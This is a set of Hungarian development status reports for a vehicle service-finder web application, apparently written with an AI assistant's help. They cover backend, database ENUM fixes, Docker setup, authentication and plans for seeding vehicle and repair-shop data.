Horgony jelentés (Frissítés) + + Probléma: Tailwind v4 PostCSS inkompatibilitás. + + Megoldás: @tailwindcss/postcss csomag telepítve, postcss.config.js frissítve. + + Backend: Stabil, az expenses és reports végpontok várják a hívásokat. + + Várható eredmény: A build folyamat most már átmegy a npm run build szakaszon, és elindul az Nginx. + +✅ Mi történik, ha ez lefut? + + A Frontend build sikeres lesz, mert minden fájlt megtalál a Vite. + + A konténer elindul a 3000-es porton. + + Bejön a kék menüs oldal, ahol tudsz váltani a Dashboard és a Költségek között. + +⚓ Állapotjelentés és Horgony (2026.01.29 - 22:15) + +Ez a dokumentum rögzíti a projekt jelenlegi "sziklaszilárd" állapotát. Ha bármi elromlik a jövőben, ide tudunk visszanyúlni. +🏗️ Rendszerarchitektúra + + Backend: FastAPI (Python 3.12) aszinkron motorral. + + Adatbázis: PostgreSQL 16, data séma, dedikált user_credits és vouchers táblák. + + Frontend: Vue 3 (Vite) + Tailwind CSS, konténerizálva (Nginx alapokon). + + Infrastruktúra: 11 aktív Docker konténer (Frontend, API, DB, Redis, RedisInsight, Minio, NPM, Dozzle, Code-server, pgAdmin). + +🗄️ Adatbázis Állapot (Data Schema) + + Validált táblák: users, companies, company_members, vehicles, vehicle_brands, engine_specs, service_providers, vouchers, user_credits, system_settings. + + Enums: companyrole ('owner', 'manager', 'driver'), expense_category_enum (Vételár -> Tuning). + + Beállítások: reg_token_expiry_hours = 48. + +🔑 Változók és Elérések + + API Port: 8000 (Backend) + + Frontend Port: 3000 (Web UI) + + Voucher Prefix: SF-XXXXXX-XXXXXX + + Discovery Bot: Működőképes, több ezer szerviz és kút betöltve. + +⚓ Állapotjelentés (Anchor Point: 2026.01.29) +1. Backend (FastAPI + Python 3.12) + + Státusz: Stabil, fut. + + API V1: Működő /billing (Voucher generálás/beváltás), /vehicles (keresés és rögzítés), /fleet (flotta kezelés). + + API V2: Modernizált /auth regisztrációval, automatikus "Széf" (Company) létrehozással és hibajavított ENUM-kezeléssel. + + Biztonság: JWT alapú hitelesítés kész, OAuth2 form támogatott. + +2. Adatbázis (PostgreSQL 16) + + Séma: data séma rögzítve. + + Költségkezelés: A data.expense_category_enum tartalmazza a kért bontást: Vételár, Átírás, Biztosítás, Tankolás, Szerviz, Parkolás, Útdíj, Büntetés, Tuning. (Ez megfelel a korábbi megbeszéléseknek). + + Adatmennyiség: Országos szerviz hálózat (~3000 mechanikus, ~2000 mosó) és főbb üzemanyagtöltő állomások betöltve az OSM Bot által. + + Beállítások: system_settings inicializálva (reg_token_expiry_hours). + +3. Infrastruktúra + + Docker: 10 konténer fut (API, DB, Redis, RedisInsight, Minio, Nginx Proxy Manager, Dozzle, Code-server, pgAdmin). + + Voucherek: Sikeresen generálhatóak és naplózhatóak. + +📋 Napi Fejlesztői Státuszjelentés + +Projekt: Service Finder / Profibot Dátum: 2026. január 29. Státusz: 🟢 STABIL (Kritikus hibák elhárítva, Rendszer üzemkész) +1. Vezetői Összefoglaló + +A mai nap a Rendszer-stabilizálás napja volt. Sikeresen leküzdöttük a PostgreSQL és a Python közötti típus-inkompatibilitási hibákat (Enum mismatch), helyreállítottuk a konténerek közötti szinkronizációt, és biztosítottuk a fejlesztői hozzáférést (Cockpit). A rendszer most már képes felhasználókat regisztrálni, cégeket (széfeket) létrehozni és jogosultságokat kezelni összeomlás nélkül. +2. Részletes Modul Státusz +🔐 Hitelesítés (Auth & Users) - ✅ KÉSZ + + Regisztráció: Hibátlanul fut. Létrejön a User, a Company (Széf) és a CompanyMember (Jogosultság). + + Adatbázis Integritás: A data.companyrole ENUM típus most már szinkronban van a Python kóddal. + + Biztonság: IP-alapú korlátozás (Throttle), Argon2 jelszó hash, és JWT token generálás aktív. + + E-mail: A rendszer tokeneket generál és "küld" (egyelőre logol) e-mail megerősítéshez és jelszó visszaállításhoz. + +🗄️ Adatbázis (PostgreSQL) - ✅ KÉSZ + + Séma: Minden tábla átmozgatva a data sémába (tisztaság végett). + + Típusok: A public sémából törölve a duplikált típusok. + + ORM: A models/company.py most már a PG_ENUM dialektust használja, ami megszüntette az "invalid input value" hibákat. + +🛠️ Infrastruktúra & Eszközök - ✅ KÉSZ + + Cockpit: Hozzáférés helyreállítva (WebSocket és SSL Origins beállítva). + + Editor: micro telepítve a szerverre a kényelmesebb szerkesztésért. + + Docker: A konténerek (api, db, redis) egészségesek és kommunikálnak. + +3. A "Megnyert Csaták" (Technikai Dokumentáció) + +A jövőbeli fejlesztéshez fontos információk: + + ENUM Kezelés: A jövőben minden új ENUM típusnál (pl. FuelType, TransmissionType) a sqlalchemy.dialects.postgresql.ENUM-ot kell használni a modellben, és kisbetűs értékeket a kódban. Ez a "recept" már bevált. + + Docker Frissítés: Ha a kódban változtatunk, néha a docker restart nem elég. A biztos módszer: docker stop -> docker rm -> docker compose up -d. + +4. Következő Lépés: Jármű Discovery Bot 🚗 + +A rendszer alapja kész, de az adatbázis még "üres" (nincsenek autók). + + Feladat: Egy Python script írása (vehicle_discovery.py), ami feltölti a rendszert alapadatokkal. + + Első kör: 50+ autómárka (Brand) importálása (Audi, BMW, BYD, Ford, Mercedes, Tesla, Volkswagen, stb.). + + Technika: A script közvetlenül a data.vehicle_brands táblába fog dolgozni, elkerülve a duplikációkat ("Upsert" logika). + +🏁 Zárszó + +A mai nap nehéz volt a "láthatatlan" hibák miatt, de mostanra egy sziklaszilárd alapunk van. A micro-val a kezedben és a működő Cockpittal a holnapi munka (az autók betöltése) már sokkal látványosabb és gyorsabb lesz. + +Készen állunk a holnapi rajtra! Pihenj egy nagyot, megérdemled! 👋 + +📋 Napi Fejlesztői Státuszjelentés + +Projekt: Service Finder / Profibot Dátum: 2026. január 29. Státusz: 🟢 STABIL (Kritikus blokkoló hibák elhárítva) +1. Vezetői Összefoglaló (Executive Summary) + +A mai nap legfontosabb eredménye a Rendszermag (Core System) stabilizálása. Sikeresen elhárítottuk a PostgreSQL és a Python közötti típus-inkompatibilitási hibákat (Enum mismatch). A felhasználói regisztrációs folyamat (User -> Company -> CompanyMember -> Token -> Audit) most már hibátlanul fut végig. A rendszer alapjai "betonbiztosak", készen állnak az üzleti logika (Járművek) fogadására. +2. Részletes Modul Státusz +🔐 Hitelesítés és Jogosultságok (Auth Module) +Funkció Állapot Megjegyzés +Regisztráció ✅ KÉSZ User + Széf + Jogosultság + Token létrejön. +Token Generálás ✅ KÉSZ email_verify és password_reset tokenek működnek. +IP Védelem ✅ KÉSZ Max 3 regisztráció / perc / IP korlát aktív. +Audit Log ✅ KÉSZ Minden regisztrációt naplózunk IP címmel. +Jelszó Hash ✅ KÉSZ Argon2 alapú titkosítás aktív. +🗄️ Adatbázis és Modellek (Database Integrity) +Terület Állapot Technikai Részletek +Séma Szerkezet ✅ KÉSZ Minden tábla a data sémába mozgatva. +Típusok (ENUM) ✅ KÉSZ data.companyrole és data.tokentype szinkronban. +ORM Leképzés ✅ KÉSZ A SQLAlchemy PG_ENUM dialektust használ. +Keresési Útvonal ✅ KÉSZ search_path beállítva: data, public. +🐳 Infrastruktúra (Docker) +Szolgáltatás Állapot Megjegyzés +service_finder_api 🟢 FUT Uvicorn szerver, Python 3.12. +postgres-db 🟢 FUT PostgreSQL 16, Healthy status. +Redis / MinIO 🟢 FUT Gyorsítótár és Fájltároló készenlétben. +3. A "Változó-Háború" Eredménye (Technikai Dokumentáció) + +A jövőbeli fejlesztéshez kritikus információ: + +A legnagyobb kihívást a Python String és a PostgreSQL ENUM illesztése okozta. A végleges, működő megoldás: + + Adatbázis oldalon: A típusok (companyrole) a data sémában léteznek, kisbetűs értékekkel (owner, manager, driver). + + Modell oldalon (company.py): + + A CompanyRole osztály értékei kisbetűsek ("owner"). + + A role oszlop definíciója: PG_ENUM(..., schema='data'). + + Logika oldalon (auth.py): + + A beszúrásnál sima stringet ("owner") vagy .value-t használunk. + +Tanulság: Soha ne bízzuk a SQLAlchemy-re az ENUM automatikus létrehozását sémák használata esetén. Mindig definiáljuk explicit módon (PG_ENUM). +4. Fejlesztés Alatt / Következő Lépések 🚧 +🚗 Jármű Discovery Bot (Tervezett indítás: Holnap) + +A rendszer üres. Szükségünk van egy automatizált robotra, ami feltölti az alap adatokat. + + Cél: Márkák (Brands) és Modellek (Models) importálása. + + Forrás: Statikus lista vagy külső API (kezdetben statikus JSON a stabilitásért). + + Fájl helye: /backend/app/scripts/vehicle_discovery.py (Létrehozandó). + + Logika: "Upsert" (csak az újat adja hozzá, a meglévőt frissíti). + +5. Teendők a holnapi kezdéshez (Action Plan) + +Amikor holnap leülsz a gép elé, ez a menetrend: + + Discovery Bot Váz: Létrehozzuk a scriptet, ami csatlakozik a stabil adatbázishoz. + + Márka Import: Feltöltjük a leggyakoribb 50 autómárkát (Audi, BMW, Ford, stb.). + + Modell Import: Hozzárendeljük a főbb modelleket. + + API Végpont: Csinálunk egy /api/v2/vehicles/brands végpontot, hogy a frontend le tudja kérdezni a listát. + +📝 Jelentés (2026-01-28 23:55) +Hiba Diagnózis Megoldás +InvalidTextRepresentation A log szerint még mindig 'OWNER' megy a DB felé. Explicit .value.lower() használata az auth.py-ban. +Database Sync A táblák és típusok már jók a data sémában. ✅ Kész. +Code State Az API fut, válaszra kész. ✅ Online. + +📝 Jelentés (2026-01-28 23:44) +Hiba Oka Státusz +Unique Constraint Hiányzott az index a (key, lang) pároson. 🛠️ JAVÍTVA (SQL 1. pont) +Datatype Mismatch A tábla public-ot, a kód data-t várt. 🛠️ JAVÍTVA (SQL 2-3. pont) +Startup Status ✅ ONLINE Az API fut, a /docs elérhető. + +📝 Projekt Jelentés (2026-01-28 23:45) +Modul Állapot Megjegyzés +Database Schema ✅ SZINKRONIZÁLVA Minden típus a data sémában, duplikációk törölve. +Auth Logic ✅ GOLYÓÁLLÓ IP-limit, Helyszínkereső, és Séma-biztos ENUM kezelés. +Models ✅ KONZISZTENS A Python modellek és a DB oszlopok 1:1 fedésben. + +📝 Jelentés (2026-01-28 23:45) + + Séma Audit: Feltárva a public és data sémák közötti típus-eltérés. + + Database Fix: Oszlop-típus konverzió előkészítve. + + Kód Stabilitás: Explicit séma-hivatkozások beállítva. + +🔄 Miért fog ez most már működni? + + A lekérdezésed (2. pont) szerint eddig a token_type a public sémára mutatott. Most az SQL-lel "átkötöttük" a data sémára. + + A Python kód most már explicit módon a data.tokentype-ot küldi (::data.tokentype). + + Mivel a kosár (data.verification_tokens) és az alma (data.tokentype) most már ugyanabból a sémából való, a Postgres boldogan elfogadja őket. + +📝 Jelentés (2026-01-28 23:15) +Fázis Állapot Megjegyzés +Import Integrity ✅ OK Az API elindul, nincs több ImportError. +Database Types ⚠️ JAVÍTÁS ALATT A data.companyrole javítva, de a tokentype még kérdéses. +Registration Flow ❌ ERROR (500) A folyamat valahol a User -> Company -> Token láncban megszakad. + +📝 Jelentés (2026-01-28 23:10) +Hiba Ok Megoldás +DatatypeMismatchError data.companyrole vs companyrole Schema-prefix hozzáadása a Python modellhez. +Enum Case Sensitivity 'OWNER' (Python) vs 'owner' (SQL) Python Enum értékek kisbetűre állítása. +Startup Status ✅ RUNNING Az API fut, már csak az adatok finomhangolása zajlik. + +📝 Mi változott? + + Jelszó visszaállítás: Bekerült a /forgot-password végpont. Ehhez fel kell töltened egy password_reset kulcsú sablont az email_templates táblába (hasonlóan a regisztrációhoz). + + IP Helyszín: Visszahoztuk a region_code mentést, így látni fogod, melyik országból jött a júzer. + + Hiba elhárítva: A verify végponton most már ott a now() alapú lejárat ellenőrzés is. + +📈 Projekt állapot jelentés + + Startup: Jelenleg kritikus hiba a hiányzó Python-szintű tábla-referencia miatt (UserVehicle). + + Teendő: UserVehicle importálása a company.py-ba. + +📝 4. Projekt Jelentés (Hibaelhárítási fázis) +Hiba jellege Valószínű ok Megoldás +Terminál Overflow Túl hosszú Python Traceback docker logs --tail 20 használata +Container Crash Szintaktikai hiba az auth.py-ban Kód ellenőrzése a Code-Serverben +SQL hiba Oszlopnév eltérés ALTER TABLE és a Python Modell szinkronizálása + +📊 Projekt Jelentés (2026-01-28 22:30) +Modul Állapot Változás +Security Emelt IP-limit (3/perc) és Admin audit alapok beépítve. +Database Fixing system_settings és email_templates séma korrigálva. +Auth Stabil Rejtett token és 48 órás alapértelmezett lejárati idő. +Infra Hiba API konténer leállt, kézi indítás szükséges. + +📈 Projekt állapot jelentés (20260128_2219) + + Státusz: ZÖLD. Minden kritikus tábla és oszlop létrehozva. + + Kockázat: Alacsony. A mentési rendszer (pg_dump) tesztelve. + + Következő: A bot kiterjesztése a motorizációs adatokra (kW, Fuel type). + +📈 Projekt állapot jelentés + + Backend: 95% (A logikai táblák és a többnyelvű sablonkezelő éles). + + Következő lépés: Az élesítő bot kódjának átírása a dinamikus API lekérdezésre. + +📈 Projekt állapot jelentés (20260128_2215) + + Backend: 90% (Már csak az egyedi bot és a fizetési kapu integrációja van hátra). + + Frontend: API szinten készen áll a többnyelvű kiszolgálásra. + +📈 Projekt állapot jelentés (20260128_2230) + + Backend: 85% (Sablonozható e-mail rendszer kész). + + Frontend/API: A regisztrációs e-mail már a DB-ből veszi a német/magyar szöveget. + + Következő: A data.email_templates feltöltése a profi HTML sablonokkal. + +📈 Projekt állapot jelentés (20260128_2200) + + Backend stabilitás: 100%. + + Funkcionális lefedettség: 70% (Az üzleti logika – számlázás, mély-keresés – még kódolásra vár). + + Infrastruktúra: NAS mentés és Docker környezet kiváló. + +📈 Projekt állapot jelentés (20260128_2145) + + Prioritás: Az új vehicle_variants és equipment táblák feltöltése valós adatokkal. + + Fejlesztés alatt: Olyan Bot tervezése, amely képes mélyebb (motor, hajtáslánc) adatok lekérésére. + +🤖 3. A Bot és a motorizáció kérdése + +A korábban látott bot valóban csak "játszani" volt jó. Egy igazi Discovery Botnak így kellene kinéznie: + + Külső forrást (pl. egy globális jármű-adatbázist) használ. + + Nemcsak márkát, hanem Motorizációt (Engine codes) is ment. + + A teherautóknál és buszoknál kezeli a tengelyképletet és a felépítményt is. + +📈 Projekt állapot jelentés (20260128_2130) + + Infrastruktúra: Cockpit és Code-Server stabil. + + Backend: Auth V2 stabil (Regisztráció/Login/Email OK). + + Adatréteg: Fejlesztés alatt (A statikus listát dinamikus lekérdezésre cseréljük). + +📊 Projekt állapot jelentés (20260128_2105) + + Státusz: ÜZEMKÉSZ. + + Elért eredmény: Sikeres regisztráció, verifikáció és bejelentkezés. + + Folyamatban: Tömeges adatbetöltés (Jármű adatbázis). + + Kockázat: Alacsony (A mentés elkészült). + +📈 Projekt állapot jelentés (20260128_2030) + + Auth V2: 95% (Regisztráció kész, cégkapcsolat automatikus, e-mail naplózás javítva). + + Infrastruktúra: Code-Server és Web-terminal stabilizálva Cockpit támogatással. + + Kritikus hiba: Nincs. + + Következő lépés: A Bot indítása a maradék 86 járműmárka és modelljeik betöltéséhez. + +📘 MI VÁLTOZOTT? (Clean Code Audit) + + Egységesítés: Minden bejelentkezés és regisztráció az /api/v2/auth alatt érhető el. Megszűnt a V1/V2 keveredés. + + Modell-szinkron: A kód most már következetesen a hashed_password, first_name és last_name mezőket használja (ahogy a User modelledben van). + + Biztonság: Az EU-szűrés és a Bot-védelem már az integrált V2 regisztráció része. + + Swagger: Ha megnyitod a /docs oldalt, egy tiszta, átlátható "Authentication V2" szekciót fogsz látni. + +🛡️ 1. Megoldás: Bot-védelem (Throttling / Rate Limit) + +Mivel már létrehoztuk az audit_logs táblát, ezt fogjuk használni „emlékezetként”. A rendszer meg fogja nézni: „Erről az IP címről próbáltak-e regisztrálni az elmúlt 10 percben?” Ha igen, egyszerűen visszautasítja a kérést. +🇪🇺 2. Megoldás: EU-only szűrés (Geo-Fencing) + +A legbiztosabb módszer az IP-alapú helymeghatározás. Ehhez egy ingyenes GeoIP szolgáltatást (pl. ip-api.com) vagy egy helyi adatbázist használunk. A kód leellenőrzi az IP címet, és ha a válasz nem egy EU-s országkód, leállítja a folyamatot. + +🚛 4. Stratégia a Nagy Adatfeltöltéshez (Járművek) + +Amint jelezed, hogy a teszt sikeres volt, jöhet a Vehicle Catalog (Jármű Katalógus). Ahogy kérted, a sorrend a következő lesz: + + A Tábla létrehozása: Létrehozunk egy data.vehicle_catalog táblát, ami támogatja a kategóriákat (Motor, Autó, Kamion). + + A "Top 200" Seeding: Küldök egy Python scriptet, ami az adatbázisba önti a 200 leggyakoribb márkát (Toyota, VW, Ford, Scania, MAN, Yamaha, Honda, stb.). + + A "Típus-hierarchia": Először a márkákat töltjük fel, majd minden márkához a legnépszerűbb típusokat (pl. VW -> Golf, Passat, Transporter; Scania -> R-series). + +Miért ne egyszerre töltsük fel az összeset? + +A világon több tízezer autó-motor-kamion típus van. Ha mindet egyszerre betoljuk: + + A legördülő menüid kezelhetetlenek lesznek. + + A kereső lassabb lesz. + + Sok lesz a "zaj" (ritka, egzotikus típusok). + +A javaslatom: A 200 fő márkát és a top 500 típust betöltjük fixen. A többit pedig egy "Dinamikus Tanuló" megoldással kezeljük: Ha a felhasználó nem találja a típusát, beírhatja kézzel, az Admin (Te) pedig egy gombbal jóváhagyod, és onnantól az is része lesz a fix katalógusnak. + +🏛️ 2. Koncepció: A Szerviz Adatstruktúra (Mielőtt feltöltjük) + +Ahogy kérted, a profi szervizkezeléshez nem elég egy név és egy cím. Itt a javaslatom, hogyan bővítsük a data.organizations és a helyszín táblákat, hogy minden dedikált kapcsolattartó meglegyen: + +Ezt a struktúrát javaslom a szervizekhez: + + Szervezeti szint (Organizations): + + Hivatalos név, Adószám, Weboldal. + + Cégvezető / Tulajdonos (Adminisztratív kapcsolattartó). + + Helyszín szint (Locations): + + GPS koordináták, Cím. + + Munkafelvétel telefonszáma (közvetlen hívás a sofőrnek). + + Munkafelvétel email címe (ide mennek az automata foglalások). + + Telephelyvezető / Szakmai vezető (technikai kérdésekhez). +🌍 3. Adatforrások: Honnan szedjük a márkaszervizeket? + +A márkaszervizek adatai „aranyat érnek”. Íme a javasolt beszerzési sorrend: + + Hivatalos Importőri Oldalak (Web Scraping / API): + + Pl: volkswagen.hu/szerviz-kereso, ford.hu/szerviz-helyszinek. + + Ezeken vannak a legpontosabb koordináták és dedikált munkafelvételi számok. + + Google Maps API (Places): + + Lekérdezhetjük a "Volkswagen szerviz Budapest" kulcsszóra az összes találatot, telefonszámot és nyitvatartást. + + Hivatalos Cégjegyzék (Opten/Cégközlöny): + + A hivatalos képviselők (tulajdonos, vezető) neveihez. + +📘 ALKALMAZÁS ÁLLAPOT ÖSSZEFOGLALÓ (2026. 01. 27.) +1. Mi van kész? (Done) + + Dinamikus Paraméterezés: Minden érték (email várakozás, flotta limit, keresési súlyok) a system_settings táblából jön. + + Audit Rendszer: Minden nem-GET kérés automatikusan naplózásra kerül az audit_logs táblába. + + Intelligens EmailManager: 3 perces várakoztatás (Throttle) és több szolgáltatós (Failover) képesség. + + SendGrid integráció: Elsődleges szolgáltatóként rögzítve az adatbázisba. + + Teljes Auth Flow: Regisztráció (tervezett), Jelszó-visszaállítás (kész), Token-kezelés (kész). + +2. Mi a következő irány az MVP-hez? + +Ahhoz, hogy az alkalmazást el tudjuk indítani (MVP elv), az alábbiakat javaslom: + + Regisztrációs végpont véglegesítése: Hogy az is az új EmailManager-t és a verification_tokens táblát használja. + + Szerviz Katalógus betöltése: Az első 10-20 alap szerviz és azok telephelyeinek rögzítése a térképen. + + Jármű Katalógus: Alapvető márkák és modellek listája, hogy a felhasználó ne csak gépeljen, hanem választhasson is. + +1. Javasolt Ingyenes Szolgáltatók (MVP fázishoz) + +A dinamikus felfutáshoz ezeket a szolgáltatókat javaslom párhuzamosan bekötni (mindegyiknek van API-ja és SMTP-je is): +Szolgáltató Ingyenes csomag Miért ajánlom? +Brevo (Sendinblue) 300 e-mail / nap Nagyon stabil, nincs havi limit, csak napi. +Resend 3,000 e-mail / hó Modern, fejlesztőbarát, kiváló a kézbesítési aránya. +SendGrid 100 e-mail / nap Iparági sztenderd, de szigorúbb az ellenőrzésük. +Mailersend 12,000 e-mail / hó Az egyik legbőkezűbb ingyenes csomag. + +📘 ALKALMAZÁS ÁLLAPOT KÖNYV (v2.11 | 2026.01.27 - 23:15) +Modul Státusz Feladat +Auth Flow ⚠️ JAVÍTÁS ALATT JWT alapú verifikációról átállás adatbázis-token alapúra. +Email System 🏗️ ÁTALAKÍTÁS ALATT Egycsatornásról többcsatornás (Multi-provider) rendszerre váltás. +Security ✅ KÉSZ Jelszó hashelés és JWT generálás stabil. + +I. ALKALMAZÁS ÁLLAPOT JELENTÉS (2026. 01. 27.) +✅ AMI KÉSZ VAN (A rendszer stabil gerince) + + SaaS Alapok: Többszereplős (Multi-tenant) struktúra, data séma izoláció, szervezetkezelés. + + Config Engine (Agy): Dinamikus beállítások (system_settings). Nem kell kódot módosítani a járműlimitek vagy a keresési súlyok állításához. + + Smart Match Engine: A súlyozott pontszámítás (Távolság + Értékelés + Bónusz) logikája működik. + + Geolokációs Kereső: A Haversine-alapú SQL lekérdezés képes valódi koordináták alapján szűrni a szervizeket. + + Dinamikus Flottakezelés: A járművek rögzítésekor a rendszer már ellenőrzi a szervezeti limitet. + +⚠️ AMI FÉLKÉSZ / JAVÍTÁSRA SZORUL + + Regisztrációs Flow: Az e-mail küldés (SMTP/Notification service) jelenleg nem aktív, így a felhasználók nem kapnak visszaigazolást. + + Keresési szűrés: A kereső már látja a távolságot, de még nem szűr a konkrét "szakmára" (pl. csak gumiszervizeket keressünk). + +❌ AMI MÉG HIÁNYZIK AZ INDULÁSHOZ (MVP Lista) + + Adatfeltöltés (Seeding): + + Jármű Katalógus: Márkák, modellek törzsadatainak betöltése. + + Alap Szervizbázis: A kezdő partner-szervizek és telephelyeik rögzítése. + + Értékelési Rendszer: Valódi review-k tárolása (hogy a rangsorolás ne "mock" adatokból dolgozzon). + + Munkafolyamat (Lead): Egy gomb, amivel a sofőr "ajánlatot kér" vagy "bejelentkezik" a választott szervizhez. + +II. MVP ÚTVONALTERV (A megvalósítás javasolt sorrendje) + +A gyors indulás érdekében ezt a sorrendet javaslom: + + E-mail küldés fixálása: Enélkül nincs valid regisztráció. (Ez legyen a következő lépésünk). + + Jármű Katalógus és Szerviz feltöltés: Készítünk egy "Master Uploader" scriptet, ami tömegesen betölti az alapadatokat. + + Szakmai szűrés: Bekötjük a service_specialties táblát a keresőbe, hogy ne csak "valamilyen" szervizt találjunk, hanem olyat, ami ért is az adott problémához. + + Egyszerű Értékelés: Létrehozzuk a táblát a véleményeknek. + +III. MESTER KÖNYVEK FRISSÍTÉSE (v2.10 | 2026.01.27 - 22:30) +📘 ADATBÁZIS SÉMA KÖNYV +Tábla Státusz Leírás +data.system_settings ✅ KÉSZ Paraméterezhetőség (limitek, súlyok). +data.organization_locations ✅ KÉSZ Koordináta alapú telephelyek. +data.vehicle_catalog ⏳ VÁR Márka/Modell törzsgyűjtemény. +data.reviews ❌ HIÁNY Ügyfél értékelések tárolása. +📚 VÁLTOZÓ KÖNYV (A rendszer potméterei) + + max_vehicles: 3 (Alap flotta limit) + + weight_distance: 0.6 (Távolság fontossága) + + weight_rating: 0.4 (Értékelés fontossága) + + smtp_server: Beállításra vár + + match_limit_default: 5 (Találati lista hossza) + +⚓ RENDER-HORGONY (V118.0) + +Fókusz: MVP Stratégia rögzítése. Következő feladat: Az e-mail küldés (SMTP) és a regisztrációs folyamat véglegesítése. + +📘 ALKALMAZÁS ÁLLAPOT ÖSSZEFOGLALÓ (2026. 01. 27.) +1. Mi van kész? (Done) + + SaaS Konfigurációs Motor: A system_settings tábla és a ConfigService segítségével minden paraméter (limitek, súlyok) kódból való újraírás nélkül, az Admin felületről állítható. + + Hierarchikus Szabályrendszer: A beállítások prioritása (Egyéni -> Tier -> Régió -> Globális) implementálva. + + Okos Rangsoroló Engine: A MatchingService képes súlyozott pontszámot számolni távolság, minőség és partneri szint alapján. + + Geolokációs Alapok: Az organization_locations tábla elkészült, támogatja a több telephellyel rendelkező szervizeket is. + + Dinamikus Flottakezelés: A jármű-rögzítési limit már az adatbázisból érkezik. + + Adatbázis Tisztaság: A data séma izolálva, az orgtype enum bővítve a SERVICE típussal. + +2. Mi a jelenlegi állapot? (Current State) + +A rendszer egy "Működő Gerinc". Képes vagy felvenni járműveket (limit ellenőrzéssel), és képes vagy szervizeket keresni koordináta alapján, ahol a találati sorrendet az üzleti súlyok (pl. profitabilitás vs. közelség) határozzák meg. +3. MVP Roadmap: Irány az indítás! + +Ahhoz, hogy az MVP (Minimum Viable Product) elindulhasson, a következő lépéseket javaslom: + + Szolgáltatás-szűrés (Specialty Filter): Ne csak minden szervizt dobjon ki, hanem lehessen szűrni (pl. "Gumicsere" vagy "Fényezés"). + + Értékelési Rendszer (Review Table): Hogy a weight_rating változó ne fix számokból, hanem valódi ügyfélvéleményekből dolgozzon. + + Szerviz Profil: Egy egyszerűbb felület, ahol a szerviz feltöltheti a nyitvatartását és a szolgáltatásait. + + Alap Workflow: Egy gomb a keresés végén: "Időpont kérése" – ami küld egy e-mailt a szerviznek a jármű adataival. + +🔍 Audit Jelentés + + Változók (Settings): ✅ RENDBEN. A data.system_settings táblában minden rangsorolási súly (weight_distance, weight_rating, stb.) a megbeszélt kulcsnévvel és értékkel szerepel. + + Séma (Schema): ⚠️ HIÁNY. Az organization_locations tábla még nem jött létre az SQL hiba miatt, így a koordinátáknak még nincs helye. + + Enum Hiba: ❌ AZONOSÍTVA. Az orgtype enum nem ismeri a "SERVICE" értéket. Ez akadályozza meg a szerviz típusú szervezetek létrehozását. + +🧠 2. A Terv: Hogyan fog működni a "Valódi" Smart Match? + +Amint megvannak a táblanevek, a következőt fogjuk tenni: + + Helyszín-alapú szűrés: Megírjuk a SQL lekérdezést, ami kiszámolja a távolságot a jármű (vagy a telefon) koordinátái és a szervizek koordinátái között (Haversine formula). + + Képesség-szűrés: Csak azokat a szervizeket vesszük figyelembe, amik rendelkeznek a kért „specialitással” (pl. Bolore Blue). + + Átadás a MatchingService-nek: A kapott listát (nevekkel, távolsággal, értékeléssel) átadjuk a már kész okos algoritmusunknak, ami elvégzi a súlyozást. + +STÁTUSZ JELENTÉS: + Üzleti logika tisztázása: ✅ 100% KÉSZ + Technikai audit (Async check): ⏳ FOLYAMATBAN + Adatmodell (SQLAlchemy) tervezése: ✅ KÉSZ + +📊 PROJEKT ÁLLAPOTJELENTÉS (V37.3 - 2026.01.26 - 11:35)HibaOkMegoldás állapotaModuleNotFoundErrorHiányzó sendgrid könyvtár🔄 Telepítés folyamatbanImportErrorV1/V2 névütközés (deps.py)⏳ Várakozik (Script készen áll)502 Bad GatewayKonténer összeomlás🛠️ Újraindítás szükséges + +📊 PROJEKT ÁLLAPOTJELENTÉS (V36.2 - 2026.01.26 - 11:35) +FunkcióÁllapotLeírásSwagger UI✅ ELÉRHETŐ +app.profibot.hu/docs működik. +API Wiring🔄 FRISSÍTÉS ALATTA main.py bekötése folyik. +Test Readiness🚀 99%Az első éles adat rögzítése következik. + +📊 PROJEKT ÁLLAPOTJELENTÉS (V36.1 - 2026.01.26 - 11:25) +FunkcióHelyszínMegjegyzés +Backend EngineDocker ContainerPython 3.12 környezet fut. +DatabasePostgres (data schema)Táblák készen állnak. +Testing ToolSwagger UI (/docs)Itt tudod manuálisan próbálgatni. +Seed Dataseed_system.pyÁSZF, GDPR és sablonok rögzítve. + +📊 PROJEKT ÁLLAPOTJELENTÉS (V36.0 - 2026.01.26 - 11:15) +Ez az a pont, ahol a technikai alapozás befejeződött, és elkezdődik a funkcionális tesztelés. +ModulÁllapotMegjegyzés +Adatbázis✅ ÉLESMinden tábla (34+ objektum) a helyén van. +Séma Szinkron✅ KÉSZAlembic és a fizikai táblák összhangban. +Alapadatok🔄 SEEDINGJogi nyilatkozatok és sablonok rögzítése. +Regisztráció⏳ KÉSZENLÉTAz API végpont hívhatóvá válik. + +📊 PROJEKT ÁLLAPOTJELENTÉS (V35.3 - 2026.01.26 - 11:45) +KomponensÁllapotMegjegyzésDatabase Tables🔄 LÉTREHOZÁS ALATT +SQLAlchemy create_all módszerrel. +Alembic Sync⏳ KÖVETKEZIKA stamp head szinkronba hozza a rendszert. +Naming Integrity✅ VÉDETTA Vehicle és egyéb modellek nevei tiszták. + +📊 PROJEKT ÁLLAPOTJELENTÉS (V35.0 - 2026.01.26 - 11:10) +FázisFeladatÁllapotMegjegyzés +ArchitektúraMulti-tenant modell✅ KÉSZUser -> Org -> Vehicle struktúra rögzítve. +AdatbázisSéma szinkronizáció🔄 UTOLSÓ LÉPÉSA baseline_v2 élesítése folyamatban. +NévkonvencióEgységesített modellek✅ KÉSZVehicle név fixálva, import hibák elhárítva. +Jogi modulÁSZF/GDPR kezelő✅ KÉSZVerziózott, régiófüggő táblák előkészítve. +BiztonságRegisztrációs tokenek✅ KÉSZLejárati időt kezelő tokentábla kész. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.26 - 13:30) +KomponensÁllapotMegjegyzés +Database Schema🔄 ÚJRAÉPÍTÉSA data séma újrateremtése folyamatban. +Alembic History🧹 TISZTAMinden korábbi verziószám törölve a Postgres-ből. +System Stability✅ MAGASA tiszta telepítés megszünteti a maradvány-hibákat. + +📊 PROJEKT ÁLLAPOTJELENTÉS (2026.01.26 - 11:55) +KomponensÁllapotMegjegyzés +Database Cleanup✅ SIKERESA „NOTICE” üzenetek igazolják a tiszta állapotot. +Schema Integrity🛡️ VÉDETTA public és data séma is ellenőrizve. +Alembic Sync⏳ KÖVETKEZIKEz a futtatás már nem ütközhet létező típusokba. + +📊 PROJEKT ÁLLAPOTJELENTÉS (V32.0 - 2026.01.26 - 13:45) +FunkcióÁllapotLeírás +Verification Tokens✅ MODELLBENKülön tábla, 24 órás lejárati idővel. +Nemzetközi Legal✅ MODELLBENRégió- és nyelvfüggő 